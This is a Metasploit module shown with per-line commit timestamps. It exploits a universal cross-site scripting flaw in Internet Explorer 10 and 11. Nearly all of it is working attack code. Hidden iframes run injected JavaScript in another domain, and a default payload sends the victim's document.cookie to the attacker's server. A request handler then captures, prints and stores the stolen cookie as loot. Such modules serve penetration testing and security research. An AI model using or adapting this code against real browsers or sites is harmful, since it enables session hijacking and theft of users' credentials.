2015-02-05 09:03:28 +00:00
|
|
|
##
|
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Auxiliary
|
|
|
|
|
|
|
|
include Msf::Exploit::Remote::HttpServer
|
|
|
|
|
|
|
|
def initialize(info={})
|
|
|
|
super(update_info(info,
|
2015-02-05 18:23:32 +00:00
|
|
|
'Name' => "Microsoft Internet Explorer 10 and 11 Cross-Domain JavaScript Injection",
|
2015-02-05 09:03:28 +00:00
|
|
|
'Description' => %q{
|
2015-02-05 17:29:52 +00:00
|
|
|
This module exploits a universal cross-site scripting (UXSS) vulnerability found in Internet
|
2015-02-05 20:59:24 +00:00
|
|
|
Explorer 10 and 11. By default, you will steal the cookie from TARGET_URI (which cannot
|
|
|
|
have X-Frame-Options or it will fail). You can also have your own custom JavaScript
|
|
|
|
by setting the CUSTOMJS option. Lastly, you might need to configure the URIHOST option if
|
|
|
|
you are behind NAT.
|
2015-02-05 09:03:28 +00:00
|
|
|
},
|
|
|
|
'License' => MSF_LICENSE,
|
2015-02-05 10:36:44 +00:00
|
|
|
'Author' =>
|
|
|
|
[
|
2015-02-05 17:29:52 +00:00
|
|
|
'David Leo', # Original discovery
|
|
|
|
'filedescriptor', # PoC
|
2015-02-05 18:25:38 +00:00
|
|
|
'joev', # He figured it out really
|
2015-02-05 17:29:52 +00:00
|
|
|
'sinn3r' # MSF
|
2015-02-05 10:36:44 +00:00
|
|
|
],
|
2015-02-05 09:03:28 +00:00
|
|
|
'References' =>
|
|
|
|
[
|
2015-02-05 20:59:24 +00:00
|
|
|
[ 'OSVDB', '117876' ],
|
2015-02-05 10:36:44 +00:00
|
|
|
[ 'URL', 'http://www.deusen.co.uk/items/insider3show.3362009741042107/'],
|
2015-02-05 09:03:28 +00:00
|
|
|
[ 'URL', 'http://innerht.ml/blog/ie-uxss.html' ],
|
|
|
|
[ 'URL', 'http://seclists.org/fulldisclosure/2015/Feb/10' ]
|
|
|
|
],
|
|
|
|
'Platform' => 'win',
|
|
|
|
'DisclosureDate' => "Feb 2 2015"
|
|
|
|
))
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
2015-02-05 18:23:32 +00:00
|
|
|
OptString.new('TARGET_URI', [ true, 'The URL for the target iframe' ]),
|
|
|
|
OptString.new('CUSTOMJS', [ false, 'Custom JavaScript' ])
|
2015-02-05 09:03:28 +00:00
|
|
|
], self.class)
|
|
|
|
end
|
|
|
|
|
|
|
|
def setup
|
|
|
|
if target_uri !~ /^http/i
|
|
|
|
raise Msf::OptionValidateError.new(['TARGET_URI'])
|
|
|
|
end
|
|
|
|
|
|
|
|
super
|
|
|
|
end
|
|
|
|
|
|
|
|
def target_uri
|
2015-02-05 18:01:19 +00:00
|
|
|
datastore['TARGET_URI']
|
2015-02-05 09:03:28 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def get_html
|
|
|
|
@html ||= html
|
|
|
|
end
|
|
|
|
|
2015-02-05 10:36:44 +00:00
|
|
|
def ninja_cookie_stealer_name
|
|
|
|
@ninja ||= "#{Rex::Text.rand_text_alpha(5)}.php"
|
|
|
|
end
|
|
|
|
|
|
|
|
def get_uri(cli=self.cli)
|
2015-02-05 17:46:38 +00:00
|
|
|
ssl = datastore["SSL"]
|
2015-02-05 10:36:44 +00:00
|
|
|
proto = (ssl ? "https://" : "http://")
|
|
|
|
if datastore['URIHOST']
|
|
|
|
host = datastore['URIHOST']
|
|
|
|
elsif (cli and cli.peerhost)
|
|
|
|
host = Rex::Socket.source_address(cli.peerhost)
|
|
|
|
else
|
|
|
|
host = srvhost_addr
|
|
|
|
end
|
|
|
|
|
|
|
|
if Rex::Socket.is_ipv6?(host)
|
|
|
|
host = "[#{host}]"
|
|
|
|
end
|
|
|
|
|
|
|
|
if datastore['URIPORT'] != 0
|
|
|
|
port = ':' + datastore['URIPORT'].to_s
|
|
|
|
elsif (ssl and datastore["SRVPORT"] == 443)
|
|
|
|
port = ''
|
|
|
|
elsif (!ssl and datastore["SRVPORT"] == 80)
|
|
|
|
port = ''
|
|
|
|
else
|
|
|
|
port = ":" + datastore["SRVPORT"].to_s
|
|
|
|
end
|
|
|
|
|
|
|
|
uri = proto + host + port + get_resource
|
|
|
|
|
|
|
|
uri
|
|
|
|
end
|
|
|
|
|
|
|
|
def server_uri
|
|
|
|
@server_uri ||= get_uri
|
|
|
|
end
|
|
|
|
|
2015-02-05 18:23:32 +00:00
|
|
|
def js
|
|
|
|
datastore['CUSTOMJS'] || %Q|var e = document.createElement('img'); e.src='#{server_uri}/#{ninja_cookie_stealer_name}?data=' + encodeURIComponent(document.cookie);|
|
|
|
|
end
|
|
|
|
|
2015-02-05 09:03:28 +00:00
|
|
|
def html
|
|
|
|
%Q|
|
2015-02-05 10:36:44 +00:00
|
|
|
<iframe style="display:none" src="#{get_resource}/redirect.php"></iframe>
|
|
|
|
<iframe style="display:none" src="#{datastore['TARGET_URI']}"></iframe>
|
2015-02-05 09:03:28 +00:00
|
|
|
<script>
|
2015-02-05 18:23:32 +00:00
|
|
|
window.onmessage = function(e){ top[1].postMessage(atob("#{Rex::Text.encode_base64(js)}"),"*"); };
|
|
|
|
var payload = 'window.onmessage=function(e){ setTimeout(e.data); }; top.postMessage(\\\\"\\\\",\\\\"*\\\\")';
|
2015-02-05 10:36:44 +00:00
|
|
|
top[0].eval('_=top[1];with(new XMLHttpRequest)open("get","#{get_resource}/sleep.php",false),send();_.location="javascript:%22%3Cscript%3E'+ encodeURIComponent(payload) +'%3C%2Fscript%3E%22"');
|
2015-02-05 09:03:28 +00:00
|
|
|
</script>
|
|
|
|
|
|
|
|
|
end
|
|
|
|
|
|
|
|
def run
|
|
|
|
exploit
|
|
|
|
end
|
|
|
|
|
2015-02-05 10:36:44 +00:00
|
|
|
def extract_cookie(uri)
|
|
|
|
Rex::Text.uri_decode(uri.to_s.scan(/#{ninja_cookie_stealer_name}\?data=(.+)/).flatten[0].to_s)
|
|
|
|
end
|
|
|
|
|
2015-02-05 09:03:28 +00:00
|
|
|
def on_request_uri(cli, request)
|
|
|
|
case request.uri
|
|
|
|
when /redirect\.php/
|
2015-02-05 17:29:52 +00:00
|
|
|
print_status("Sending redirect")
|
2015-02-05 09:03:28 +00:00
|
|
|
send_redirect(cli, "#{datastore['TARGET_URI']}")
|
2015-02-05 10:36:44 +00:00
|
|
|
when /sleep\.php/
|
|
|
|
sleep(3)
|
2015-02-05 09:03:28 +00:00
|
|
|
send_response(cli, '')
|
2015-02-05 10:36:44 +00:00
|
|
|
when /#{ninja_cookie_stealer_name}/
|
|
|
|
data = extract_cookie(request.uri)
|
|
|
|
if data.blank?
|
|
|
|
print_status("The XSS worked, but no cookie")
|
|
|
|
else
|
|
|
|
print_status("Got cookie")
|
|
|
|
print_line(data)
|
2015-02-05 15:48:45 +00:00
|
|
|
report_note(
|
|
|
|
:host => cli.peerhost,
|
|
|
|
:type => 'ie.cookie',
|
|
|
|
:data => data
|
|
|
|
)
|
2015-02-05 17:36:35 +00:00
|
|
|
path = store_loot('ie_uxss_cookie', "text/plain", cli.peerhost, data, "#{cli.peerhost}_ie_cookie.txt", "IE Cookie")
|
|
|
|
vprint_good("Cookie stored as: #{path}")
|
2015-02-05 10:36:44 +00:00
|
|
|
end
|
2015-02-05 09:03:28 +00:00
|
|
|
else
|
2015-02-05 17:29:52 +00:00
|
|
|
print_status("Sending HTML")
|
2015-02-05 09:03:28 +00:00
|
|
|
send_response(cli, get_html)
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
end
|